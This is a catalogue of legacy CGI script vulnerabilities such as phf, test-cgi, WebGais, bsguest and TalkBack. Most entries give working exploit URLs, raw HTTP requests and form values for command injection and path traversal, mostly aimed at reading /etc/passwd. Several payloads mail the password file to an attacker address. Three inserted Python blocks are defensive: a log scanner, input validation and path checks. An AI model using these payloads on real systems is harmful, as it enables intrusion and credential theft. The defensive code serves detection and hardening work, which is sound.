-<>-
PHF

The phf script, which shipped as standard with the popular Apache web server, contains a serious flaw: its parameter checking is incorrect, so literally any command can be executed on the system.

Exploit:

Using the URL:

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 

will display the password file from the server. 

-<>-
Test-cgi

Anyone can remotely inventory the files on a machine. 

Exploit: 

Using the URL: /cgi-bin/test-cgi?* 

will display the contents of the server's cgi directory.

Using the URL: /cgi-bin/test-cgi?/*

will display the contents of the server's root directory.

Both listings will be displayed via the QUERY_STRING field, however, it is also possible to get listings via the CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, and (with the help of rDNS) the REMOTE_HOST field. 

For example, to get a listing of the root directory via the SERVER_PROTOCOL field, you would telnet to the server on port 80 and use:

GET /cgi-bin/test-cgi?x> /*

-<>-
Fax Survey

If the HylaFAX package is installed (common on some older Linux distributions), arbitrary commands can be executed as the UID of the web server:

Exploit:

/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

The above example URL exposes the passwd file of the server.

-<>-
Dump

This program, written in Perl, displays general environment information about the system on which a web server resides. This information may include the version of web server software being used, path information and information about the system's directory settings.

-<>-
Handler

A small Perl program intended to let users read and download files under the system's root directory. In fact it allows any command to be executed remotely on the target machine.

Exploit: 

GET /cgi-bin/handler/useless_stuff;cat /etc/passwd| ?data=Download 

Telnetting to the server on port 80 and typing the above will return the server's password file.
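The phf, test-cgi, faxsurvey and handler requests above all leave distinctive traces in a web server's access log. As an added example (not part of the original text), a small Python scanner that URL-decodes each requested path and flags those signatures; the log lines are constructed samples in Common Log Format, not real traffic:

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); these are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/1999:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043
10.0.0.7 - - [12/Mar/1999:10:01:09 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 874
10.0.0.7 - - [12/Mar/1999:10:01:15 +0000] "GET /cgi-bin/test-cgi?/* HTTP/1.0" 200 2210
10.0.0.9 - - [12/Mar/1999:10:02:31 +0000] "GET /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd HTTP/1.0" 404 291
10.0.0.9 - - [12/Mar/1999:10:02:40 +0000] "GET /cgi-bin/handler/useless_stuff;cat%20/etc/passwd|%20?data=Download HTTP/1.0" 200 874
10.0.0.3 - - [12/Mar/1999:10:03:00 +0000] "GET /cgi-bin/search.cgi?q=cats HTTP/1.0" 200 512
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD URL PROTO", status ...
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)(?: \S+)?" (?P<status>\d{3})'
)

# Detection rules, applied to the URL-decoded request path and query string.
RULES = [
    ("phf-newline-cmd", re.compile(r"/cgi-bin/phf\?.*\n")),        # %0a followed by a command
    ("test-cgi-glob", re.compile(r"/cgi-bin/test-cgi\?[^&]*\*")),  # shell glob in QUERY_STRING
    ("faxsurvey-cmd", re.compile(r"/cgi-bin/faxsurvey\?/")),       # absolute command path as query
    ("handler-shell-meta", re.compile(r"/cgi-bin/handler/[^?]*[;|]")),  # ; or | in the path
    ("sensitive-file", re.compile(r"/etc/(passwd|shadow)")),
]


def parse_line(line):
    """Split one CLF line into its fields, adding the decoded URL; None if it does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote(rec["url"])
    return rec


def scan(log_text):
    """Return one hit per log line that matches at least one rule, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        matched = [name for name, rx in RULES if rx.search(rec["decoded"])]
        if matched:
            hits.append({"ip": rec["ip"], "url": rec["url"],
                         "status": int(rec["status"]), "rules": matched})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f'{h["ip"]} {h["status"]} {h["url"]} -> {", ".join(h["rules"])}')
```

A 404 still counts as a hit: a probe for a script that is not installed is as useful to the defender as one that succeeded.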

-<>-
Netauth

Netauth is a web based email management system for Windows NT and most Unix platforms. This product contains a security hole that enables remote users to download local files, including files like /etc/shadow.

Exploit:

http://www.example.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

The above URL would retrieve the passwd file from the server.

-<>-
Calender.pl

The vulnerability allows remote users to execute arbitrary commands on the web server with the privileges of the httpd process. 

The calender_admin.pl script prompts the user for a configuration file to modify, and then, in an attempt to authenticate the user, passes the user input straight to Perl's open(). This can be easily exploited to execute arbitrary commands remotely.

Exploit:

http://www.example.com/cgi-bin/calender_admin.pl 

Going to that URL presents username, password and configuration-file input fields. Ignore username and password and enter:

|<command here>|
(with the pipes) in the configuration file field.

For example: 
|ping 127.0.0.1| 

and the command will be executed.

-<>-
HTML Script

Htmlscript has a vulnerability in it which allows you to access system files, presumably any file the web server user can access.

Exploit:

http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd

The above URL would get the passwd file from the server.

-<>-
wwwboard.pl

There is no input checking done on the list of articles which a given article is a followup to.  This allows us to give it invalid input such that we can clobber files that the web server has write permissions to.

For example, this HTML snippet, when read by Netscape (and the button is pushed), will clobber articles 1 to 5 on the wwwboard at some.poor.host.

<form method=POST action="http://some.poor.host/cgi-bin/wwwboard.pl">
<input type=hidden name="followup" value="1,2,3,4,5,|.|">
<input type=submit value="Clobber web board">
</form>

-<>-
Finger

Get a list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@acme.net", and that your email address is  "your@email.org")

Go to the finger box, and type this in (changing these email addresses for the real ones):

kangaroo@acme.net ; /bin/mail your@email.org < etc/passwd

This takes the passwd file through kangaroo@acme.net and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.

-<>-
bnbform.cgi

BNBForm is a form processing cgi by BigNoseBird. The problem is that this form sends a responding email to users with the contents of any file contained in the 'automessage' variable. This can be used to specify any file that is readable by the uid of the webserver.

Exploit:

The exploit is an html form, but was too large to include here. Please search for "bnbform exploit" at a good search engine to get the code.
 
-<>-
survey.cgi

BNBSurvey is a CGI for doing simple surveys. This script has two modes of operation: in the first, people can vote as many times as they like; in the second, people can only vote once every hour. The first mode is the default.

If the second mode of operation is enabled (i.e. if $ENFORCEMENT = "1" is set in the cgi script), remote users can use metacharacters in the 'filebase' variable to execute arbitrary commands.

Exploit:

This exploit code was too large to include, please search for "bnbsurvey exploit" at a good search engine.

-<>-
classifieds.cgi

Classifieds is a free cgi script for handling classified ads. There are multiple security holes in this that allow remote execution. Firstly, by setting your email address as something like "duke@viper.net.au</etc/passwd" you can read files remotely off the server. 

Also, by setting the hidden variables on an HTML form, a remote user can force arbitrary commands to be executed. One example of this is modifying the following variable:

<input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Changing its value to another command will cause that alternate command to be executed.

-<>-
textcounter.pl

Textcounter allows anybody to execute commands on your system with the same rights as the httpd daemon.

-<>-
Count.cgi

There are at least two buffer overflow vulnerabilities in wwwcount, a widely used CGI web counter. The most harmful occurs when the QUERY_STRING environment variable (which reflects the URL asked for by the www client) is copied to a fixed-size dynamic buffer. Another one occurs only when the counter is compiled with a special authentication option, and may not be exploitable.

-<>-
WebGais

WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "webgais" and does the actual interfacing with the search tool.

It reads the query from a user form, and then runs the GAIS search engine for that query. The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse). 

Exploit:

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

-<>-
Web Sendmail

Websendmail is a cgi-bin that comes with the WEBgais package, which is an interface to the GAIS search tool. It is a Perl script that reads input from a form and sends e-mail to the specified destination.

Exploit:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

-<>-
CGI Counter

The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server, but other exploits can be used to get root access on an unpatched OS. 

Exploit: 

Using a straight URL:
http://www.example.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id 
(This will display the uname of a given system) 

Passing commands in a variable: 
$ telnet www.example.com www 
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0 
X: pwd;ls -la /etc;cat /etc/passwd 

$ telnet www.example.com www 
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0 
X: echo;id;uname -a;w 

-<>-
SGI infosrch

The Infosearch subsystem is used to search and browse virtually all SGI on-line documentation. A vulnerability has been discovered in infosrch.cgi which could allow any remote user to view files on the vulnerable system with the privileges of the user "nobody".

-<>-
Poll It

Poll It allows easy hosting of online polls on websites. However, this CGI also enables remote attackers to read any world-readable file on the server.

Exploit:

/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00

The above URL would retrieve the passwd file from the server.

-<>-
Robpoll

Robpoll is a free CGI-based admin program.

Exploit:

First go to:

http://www.example.com/cgi-bin/robpoll.cgi?Admin

You will have an option to change the password. The default password is "robpoll"; leaving this default in place compromises the system and its files.

-<>-
WebBanner

A security hole in the WebBanner CGI enables remote attackers to view certain files on the system, and possibly execute system commands as well.

Exploit: 

http://www.example.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd 

The above URL will retrieve the passwd file from the server.

-<>-
WebWho+

WebWho+ is a free cgi script for executing whois queries via the www. Though it does perform checks for shell escape characters on some parameters, it misses the 'type' variable and allows for malicious input to be sent to a shell. It is possible to execute arbitrary commands on a webserver running WebWho+ v1.1 with the uid of the webserver (usually nobody).

-<>-
SWC

Swc implements a simple web counter. It is meant to support those "this page has been visited xxx times" sentences at the bottom of many web pages, through a CGI interface. The mentioned product contains a remotely exploitable buffer overflow that enables remote attackers to execute code on the server.

Exploit:

Simple Web Counter contains an exploitable buffer overflow when it parses the ctr= parameter. If this parameter is provided with a large enough buffer, it will cause the CGI to overflow one of its variables, enabling the execution of arbitrary code. 

-<>-
News.cgi

The problem allows anyone to add an author to the 'authors.file' file. This can't be done through a web browser, since the script assumes that if the HTTP_REFERER field is the URL of the news.cgi script (the main script) then you must have completed the login process :). This assumption would hold if you were using a browser, but.... the Referer header is easily forged.

Exploit:

Using netcat to make a raw HTTP request:

POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: n30/browser
Host: www.speedy3d.com
Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71

author=n30&apassword=teapot&email=don@know.com&name=n30&password=teapot

it is possible to add an author.

-<>-
Ralf's chat CGI

The CGI contains a default master password (which is set by default to: mpw), if this password is provided by an unprivileged user, all moderator/operator rights will be given to him or her. 

Exploit:

Due to bad permission settings a remote attacker can read the config.pm file, which among other things contains the master password.

e.g.:

http://www.example.com/cgi-bin/config.pm 

Also, by accessing: http://www.example.com/cgi-bin/data/nicks you can view all the nicknames and passwords etc.

-<>-
Sambar

The Sambar Server search CGI vulnerability occurs in search.dll, the Sambar ISAPI Search shipped with this product. This dynamic link library does not check the 'query' parameter that is passed to the server, therefore by constructing a malformed URL we are able to view the contents of the server, all folders, and files.

Exploit:

All that is needed is a malformed query parameter passed to the search.dll file.

http://server-running-sambar.com/search.dll?search?query=%00&logic=AND

This will reveal the current working directory contents.

http://server-running-sambar.com/search.dll?search?query=/&logic=AND 

This will reveal the root dir of the server.

-<>-
Whois.cgi

There is a metacharacter bug in the script that means only the ; character is removed by the checking. This means you can still use pipes and redirection characters etc.

Exploit:

They would be limitless, typically something like:

microsoft.com|cat /etc/passwd

would retrieve the password file from the server.

-<>-
EZshopper

EZshopper 3.0 and 2.0 contain some Perl scripts, including a CGI program called loadpage.cgi that is used to open and show HTML files under EZshopper's directory. However, no proper checking is performed, and therefore you can view the contents of the EZshopper directory and its subdirectories.

Exploit:

To view the contents of the root directory:

EZshopper v3.0: 
http://example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/ 

EZshopper v2.0: 
http://example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/

To view file list of EZshopper subdirectory: 

EZshopper v3.0: 
http://example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/subdirectory/ 

EZshopper v2.0: 
http://example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/subdirectory/

Once an attacker is able to get the list, he can use the following URL to view the content of arbitrary files: 

EZshopper v3.0: 
http://example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=<id>&file=/<directory>/<filename> 

EZshopper v2.0: 
http://example.com/cgi-bin/ezshopper2/loadpage.cgi?<id>+/<directory>/<filename> 

-<>-
Technote

Technote 2000 is a well-known Korean CGI board. A security vulnerability in the product allows remote attackers to view arbitrary files, and possibly also execute arbitrary commands.

Exploit:

File viewing:
 
By accessing the following URL the file /etc/passwd will be sent back to the user: 
http://www.example.com/technote/print.cgi?board=../../../../../../../../etc/passwd%00 

File downloading:
 
By accessing the following URL the file /../../../main.cgi will be downloaded (not viewed) by the user: 
http://www.example.com/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi 

-<>-
bsguest.cgi

BSGuest does not filter out the ; character, so anyone can execute commands on the server.

Exploit:

The attacker just enters his email address as:

hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd

and then the server mails a confirmation letter along with the passwd file to the attacker. 

-<>-
bslist.cgi

BSList doesn't filter out the ; character either, allowing anyone to execute commands on the server.

Exploit:

This can be exploited by signing up for the mailing list with the email address of:

hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd

-<>-
Guestserver

Guestserver, a guestbook system, is vulnerable to a remote command execution bug. This bug is caused by incomplete sanitisation of the email variable from the HTTP POST.

Exploit:

The | (pipe) character is not filtered! We can therefore construct an email variable with commands delimited by |'s and the CGI will happily execute these commands if it looks like a "normal" email address. An example email variable that would execute "bleh" on remote server (check error_log): "| bleh | bob@example.com". This would result in the execution of "/bin/sh -c | bleh | bob@example.com" on the remote server. If you look in apache's error_log you will see the following entry: 

sh: bleh: command not found 
sh: bob@example.com: command not found 
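The bsguest, bslist, classifieds and guestserver bugs above share one cause: a user-supplied address is interpolated into a shell command line that invokes sendmail. As an added example (not code from any of those scripts), the defensive pattern in Python: validate the address against a strict allow-list, then pass it to sendmail as its own argv element with no shell, so ;, |, < and newlines are never interpreted. The sendmail path and the address format are assumptions.

```python
import re
import subprocess

# Allow-list for a single plain user@host address (assumption: that is all the form needs).
# The first character must be alphanumeric, which also blocks "-flag" argument injection.
ADDRESS_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]*@"
    r"[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)+"
)

SENDMAIL = "/usr/sbin/sendmail"  # assumed path; adjust for the host


def is_safe_address(address):
    """True only for one plain address with no whitespace, metacharacters or newlines."""
    return len(address) <= 254 and ADDRESS_RE.fullmatch(address) is not None


def build_sendmail_argv(address):
    """Return the argv list for sendmail, or raise ValueError instead of passing bad input on."""
    if not is_safe_address(address):
        raise ValueError("rejected recipient address")
    # -oi: do not treat a lone "." line in the message as end of input
    return [SENDMAIL, "-oi", address]


def send_confirmation(address, body, run=subprocess.run):
    """Hand the message to sendmail on stdin. No shell is involved, so the address is data only.

    `run` is injectable so the function can be exercised without a real MTA present."""
    argv = build_sendmail_argv(address)
    message = f"To: {address}\nSubject: Confirmation\n\n{body}\n"
    result = run(argv, input=message.encode(), check=False)
    return result.returncode == 0


# Constructed payloads modelled on the entries above; each is rejected before any process runs.
REJECTED_SAMPLES = [
    "hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd",  # bsguest/bslist
    "| bleh | bob@example.com",                                                # guestserver
    "duke@viper.net.au</etc/passwd",                                           # classifieds
    "bob@example.com\nrcpt: other",                                            # header injection
    "-bs@example.com",                                                         # option injection
]

if __name__ == "__main__":
    print(build_sendmail_argv("bob@example.com"))
    for s in REJECTED_SAMPLES:
        print(repr(s), "->", "accepted" if is_safe_address(s) else "rejected")
```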

-<>-
WebPage

The WebPage Replicator script exposes several environment variables. Any remote attacker can view this information by providing a special URL. Webpage.cgi dumps useful information such as script location, HTTP root, version of Perl, server_admin, server_name, and path to the browser when the database file provided is incorrect. 

Exploit:

If the site does not contain a file named ukr.htm, the following URL displays the environment dump:

http://www.example.com/cgi-bin/replicator/webpage.cgi/313373/ukr.htm 

-<>-
Thinking Arts Store

The Thinking Arts E-Commerce package comes with a web store front-end called store.cgi, which lets customers order products from the website, backed by a SQL database. A security vulnerability in the product allows remote attackers to download content outside the normal web root.

Exploit:

Adding the string "/../" to a URL allows an attacker to view any file on the server, and also list directories on the server which the owner of the vulnerable HTTPd has permission to access. Remote execution of commands does not appear to be possible with this directory traversal bug, but directory listing is. Please note that you do need the %00.html at the end of your command.

http://www.example.com/cgi-bin/store.cgi?StartID=../../../../../etc/hosts%00.html 

http://www.example.com/cgi-bin/store.cgi?StartID=../../../../../etc/%00.html 

-<>-
WebSPIRS

WebSPIRS is SilverPlatter's Information Retrieval System for the World Wide Web (WWW). It is a common gateway interface (CGI) application that allows any forms-capable browser, such as Netscape, to search SilverPlatter (SP) Electronic Reference Library (ERL) databases available over the Internet. A security vulnerability in the CGI allows remote attackers to view any locally available file (mainly world-readable files).

Exploit:

webspirs.cgi?sp.nextform=../../../../../../path/to/file 

-<>-
ASPSeek

ASPSeek is an open source search engine software developed by SWsoft. Several buffer overflow vulnerabilities enable remote attackers to execute code on the web server remotely, with the privileges of the web server.

Exploit:

Code too large to include here. Check a vulnerability search engine for more information.

-<>-
TalkBack

TalkBack gives users an opportunity to air their views in a section on a website. A security vulnerability in the program allows remote users (website visitors) to view any world-readable file on a webserver (If webserver is running on a higher user than nobody or equivalent, then additional files can be accessed). 

Exploit:

The following URL would show the passwd file from the server:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 

The following URL will show the source of the CGI (which contains the admin password):

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1

If you find the admin password in the source, you can then go to:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin 

and add/delete posts.

-<>-
CrazyWWWBoard

CrazyWWWBoard is a web bulletin board program written in C. A security vulnerability in the bulletin board allows execution of arbitrary code with the web server's privileges.

Exploit:

The source code to the exploit is available, but too large to include here.

-<>-
Email List

The Email List Generator is a web-interfaced script that allows the visitors on your web site to leave their email address so they may be notified when you update your web site.

This script also provides the ability to create and change the message you wish to send to your list right from the web browser as well as to maintain the list being generated.

There are two parts to the script. The nph-maillist.pl file carries all the functionality for the web interface and the mailengine.pl is the workhorse that runs in the background until the entire list is emailed. A security vulnerability in the product allows remote attackers to execute any arbitrary commands they want to. 

Exploit:

The source code to the exploit is available, but too large to include here.

-<>-
DCForum

DCForum is a popular CGI to create message boards on web sites. It is vulnerable to an attack which will grant a remote attacker the status of DCForum administrator, which can then be used to execute arbitrary commands on the server. This works because the forum signup does not validate the input correctly. Therefore, by registering with a last name containing URL-encoded newlines and pipes, an attacker can embed a second line into his last name, which will be recorded as an entirely new line in the password file, containing whatever information the attacker wants. This means that an attacker can add his very own admin account straight into the password file.

Exploit:

The exploit is very simple, but I have not included it here. You will need to go and find the advisory for this exploit off the net. There is also a perl script to automate the hack.

-<>-
viewsrc.cgi

viewsrc.cgi v2.0 is a source-code viewing CGI script. A vulnerability exists which allows a remote user to view any file on the server.

Exploit:

The following URL demonstrates how you could get any file from the server:

http://localhost/cgi-bin/viewsrc.cgi?loc=../<any file!>
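Netauth, htmlscript, Poll It, Technote, TalkBack, Thinking Arts, EZshopper and viewsrc.cgi all hand a user-supplied name straight to the filesystem, and several of the exploits only work because a %00 truncates whatever suffix the script appends. As an added example (not code from any of those scripts), the containment check each should have performed, in Python: decode the parameter, reject NUL bytes and absolute paths, resolve the real path and confirm it is still below the directory the script is meant to serve. The document root used in the demo is a constructed value.

```python
import os
from urllib.parse import unquote


def safe_join(root, user_path):
    """Return the absolute path of user_path inside root, or raise ValueError.

    root is assumed to be the only directory the CGI is meant to serve files from.
    """
    decoded = unquote(user_path)  # %00, %2e%2e and friends become real characters first
    if "\x00" in decoded:
        # A C-level open() stops at the NUL, so any suffix the script appends is discarded.
        raise ValueError("NUL byte in path")
    if os.path.isabs(decoded):
        raise ValueError("absolute path")
    root_real = os.path.realpath(root)
    # realpath collapses ../ segments and follows symlinks before the comparison is made
    target = os.path.realpath(os.path.join(root_real, decoded))
    # commonpath (not startswith) so /srv/www/htdocs2 is not mistaken for /srv/www/htdocs
    if os.path.commonpath([root_real, target]) != root_real:
        raise ValueError("path escapes document directory")
    return target


def classify(root, candidates):
    """Map each candidate parameter value to 'ok' or the reason it was rejected."""
    verdicts = {}
    for c in candidates:
        try:
            safe_join(root, c)
            verdicts[c] = "ok"
        except ValueError as e:
            verdicts[c] = str(e)
    return verdicts


# Constructed parameter values modelled on the entries above.
SAMPLES = [
    "news/today.html",                          # legitimate
    "../../../../../../../../etc/passwd",       # netauth / htmlscript style traversal
    "../../../../../../../../etc/passwd%00",    # technote / talkback style, NUL-terminated
    "../../../../../etc/hosts%00.html",         # thinking arts style, NUL before suffix
    "/etc/passwd",                              # pollit style absolute path
    "sub/../../etc/passwd",                     # escapes via a real subdirectory
    "sub/../index.html",                        # harmless ../ that stays inside root
]

if __name__ == "__main__":
    for path, verdict in classify("/srv/www/htdocs", SAMPLES).items():
        print(f"{path!r:45} {verdict}")
```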

-<>-